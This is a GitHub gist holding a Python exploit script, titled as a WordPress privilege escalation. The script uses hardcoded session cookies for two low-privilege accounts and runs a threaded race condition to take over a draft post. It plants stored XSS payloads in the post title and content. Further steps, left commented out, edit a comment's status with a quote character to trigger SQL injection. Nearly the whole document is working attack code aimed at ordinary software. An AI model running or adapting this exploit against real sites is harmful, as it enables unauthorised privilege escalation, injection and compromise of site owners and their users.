Created
August 19, 2015 06:30
-
-
Save phith0n/412dc397869818c426ee to your computer and use it in GitHub Desktop.
wordpress提权
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import requests, re, threading, time, sys, copy | |
| def checksucc(func): | |
| def _func(*args, **kwargs): | |
| self = args[0] | |
| if not self.succ: | |
| print "[error] {info}".format(info = self.error) | |
| return sys.exit(0) | |
| else: | |
| return func(*args, **kwargs) | |
| return _func | |
| class exploit: | |
| headers = { | |
| "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36" | |
| } | |
| target = "http://10.211.55.3/wordpress" | |
| cookie1 = "wordpress_abb41118cdb73b76f33e5ac81ad3076f=test%7C1441174781%7CxP4WhCpqQEA2C5A5vZ3VDxCsJxn2TpFvRNoIKjLyd8o%7Caad3f96a3325844794908a27bfb63e807bbacd1ce4f15f812edbc2db9a16d99b;wordpress_logged_in_abb41118cdb73b76f33e5ac81ad3076f=test%7C1441174781%7CxP4WhCpqQEA2C5A5vZ3VDxCsJxn2TpFvRNoIKjLyd8o%7C91b957304d6be29da36650a1a150ea6dc18a85e4dbdb717e3e5ca83dca88002e;wordpress_test_cookie=WP+Cookie+check;wp-settings-2=mfold%3Do;wp-settings-time-2=1439522691;" | |
| cookie2 = "wordpress_abb41118cdb73b76f33e5ac81ad3076f=test2%7C1441174856%7CH6ePKJHA3Vil6XCNZyzyO1IoaCJPuJZfv7S5dSRZ2zQ%7C9160d6a76f6c0d81196a1ded10f91242f67fc953f749cf1ca4885e13d36ed101;wordpress_logged_in_abb41118cdb73b76f33e5ac81ad3076f=test2%7C1441174856%7CH6ePKJHA3Vil6XCNZyzyO1IoaCJPuJZfv7S5dSRZ2zQ%7Cade65c2b99cb07ceb0fe7d34b0c6634c0005175fb0eb4cda67539dade3800eaa;wordpress_test_cookie=WP+Cookie+check;wp-settings-time-2=1439518321;wp-settings-time-3=1439965256;" | |
| comment_id = 26 | |
| proxies = { | |
| "http": "http://127.0.0.1:8085" | |
| } | |
| def __init__(self): | |
| self.wpnonce = None | |
| self.postid = 0 | |
| self.headers["Cookie"] = self.cookie1 | |
| self.begin_time = time.time() | |
| # error handler | |
| self.succ = True | |
| self.error = "" | |
| def __error(self, error): | |
| self.error = error | |
| self.succ = False | |
| def get_wpnonce(self): | |
| url = self.target + "/wp-admin/post.php?action=post-quickdraft-save" | |
| source = self.__get_wpnonce(url, ur'value="([0-9a-f]{10})"') | |
| rex = re.search(ur'<input type="hidden" name="post_ID" value="(\d+)" />', source) | |
| if rex: | |
| self.postid = int(rex.group(1)) | |
| else: | |
| self.__error("cannot get post id") | |
| @staticmethod | |
| def add_new_post(self): | |
| time.sleep(1.5) | |
| url = self.target + "/wp-admin/post.php?action=post-quickdraft-save" | |
| headers = copy.deepcopy(self.headers) | |
| headers["Cookie"] = self.cookie2 | |
| response = requests.get(url, headers = headers, allow_redirects = False) | |
| @checksucc | |
| def edit_post(self): | |
| url = self.target + "/wp-admin/post.php?action=postajaxpost&post={id}".format(id = self.postid) | |
| data = { | |
| "_wpnonce": self.wpnonce, | |
| "post_ID": (self.postid + 1), | |
| "post_content": "Win!!!!</title></textarea>'\"><img src=1 onerror=alert(1);>xxxx", | |
| "post_status": "private", | |
| "comment_status": "open", | |
| "post_title": "</title></textarea>'\"><img src=1 onerror=alert(1);>", | |
| "saveasprivate": "private", | |
| "tax_input[post_tag]": ",".join([str(-i) for i in xrange(10000)]) | |
| } | |
| t = threading.Thread(target = exploit.add_new_post, args = (self, )) | |
| t.setDaemon(True) | |
| t.start() | |
| response = requests.post(url, data = data, headers = self.headers, allow_redirects = False) | |
| try: | |
| assert(response.status_code == 302) | |
| print "Success, Time: {time}s, Url: {url}".format(time = time.time() - self.begin_time, url = "%s/wp-admin/post.php?post=%d&action=edit" % (self.target, self.postid + 2)) | |
| except: | |
| self.__error("cannot edit post") | |
| def __get_wpnonce(self, url, restr): | |
| source = requests.get(url, headers = self.headers, allow_redirects = False).content | |
| rex = re.search(restr, source) | |
| if rex: | |
| self.wpnonce = rex.group(1) | |
| else: | |
| self.__error("cannot get _wpnonce") | |
| return source | |
| @checksucc | |
| def get_trash_wpnonce(self): | |
| url = self.target + "/wp-admin/post.php?post={id}&action=edit".format(id = self.postid + 2) | |
| self.__get_wpnonce(url, ur'\&\;_wpnonce=([0-9a-f]{10})">') | |
| @checksucc | |
| def get_addcomment_wpnonce(self): | |
| url = self.target + "/wp-admin/edit-comments.php" | |
| self.__get_wpnonce(url, ur'name="_ajax_nonce\-replyto-comment" value="([a-f0-9]{10})"') | |
| @checksucc | |
| def add_comment(self): | |
| data = { | |
| "_ajax_nonce-replyto-comment": self.wpnonce, | |
| "action": "replyto-comment", | |
| "comment_post_ID": str(self.postid + 2), | |
| "content": "test by phithon" | |
| } | |
| url = self.target + "/wp-admin/admin-ajax.php" | |
| response = requests.post(url, data = data, headers = self.headers, allow_redirects = False) | |
| try: | |
| assert(int(response.content) > 0) | |
| assert(response.status_code == 200) | |
| except: | |
| self.__error("add comment error") | |
| @checksucc | |
| def get_edit_wpnonce(self): | |
| url = self.target + "/wp-admin/comment.php?action=editcomment&c=%d" % self.comment_id | |
| self.__get_wpnonce(url, ur'value="([0-9a-f]{10})"') | |
| @checksucc | |
| def edit_comment(self): | |
| data = { | |
| "_wpnonce": self.wpnonce, | |
| "_wp_http_referer": "/wp-admin/comment.php?action=editcomment&c=%d" % self.comment_id, | |
| "action": "editedcomment", | |
| "comment_ID": str(self.comment_id), | |
| "comment_post_ID": str(self.postid + 2), | |
| "save": "Update", | |
| "comment_status": "1'xxx" | |
| } | |
| url = self.target + "/wp-admin/comment.php" | |
| response = requests.post(url, data = data, headers = self.headers, allow_redirects = False) | |
| try: | |
| assert(response.status_code == 302) | |
| except: | |
| self.__error("edit comment error") | |
| @checksucc | |
| def trash_post(self): | |
| url = self.target + "/wp-admin/post.php" | |
| data = { | |
| "action": "trash", | |
| "post_ID": str(self.postid + 2), | |
| "_wpnonce": self.wpnonce | |
| } | |
| response = requests.post(url, data = data, headers = self.headers, allow_redirects = False, proxies = self.proxies) | |
| try: | |
| assert(response.status_code == 302) | |
| except: | |
| self.__error("trash post error") | |
| @checksucc | |
| def untrash_post(self): | |
| url = self.target + "/wp-admin/post.php" | |
| data = { | |
| "action": "untrash", | |
| "post_ID": str(self.postid + 1), | |
| "_wpnonce": "Here I dont know" | |
| } | |
| reponse = requests.post(url, data = data, headers = self.headers) | |
| print "[+] Finish SQL Injection!!" | |
| if "__main__" == __name__: | |
| exp = exploit() | |
| print "[+] Process 1" | |
| # 1: get nonce | |
| exp.get_wpnonce() | |
| print "[+] Process 2" | |
| # 2: find draft post id | |
| exp.edit_post() | |
| # print "[+] Process 3" | |
| # exp.get_addcomment_wpnonce() | |
| # print "[+] Process 4" | |
| # exp.add_comment() | |
| # print "[+] Poccess 3" | |
| # # 3: get edit _wpnonce | |
| # exp.get_edit_wpnonce() | |
| # print "[+] Poccess 4" | |
| # # 4: edit comment | |
| # exp.edit_comment() | |
| # print "[+] Poccess 5" | |
| # # 5: get trash wpnonce | |
| # exp.get_trash_wpnonce() | |
| # print "[+] Poccess 6" | |
| # # 6: trash post | |
| # exp.trash_post() | |
| # print "[+] Poccess 7" | |
| # # 7: untrash_post | |
| # exp.untrash_post() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment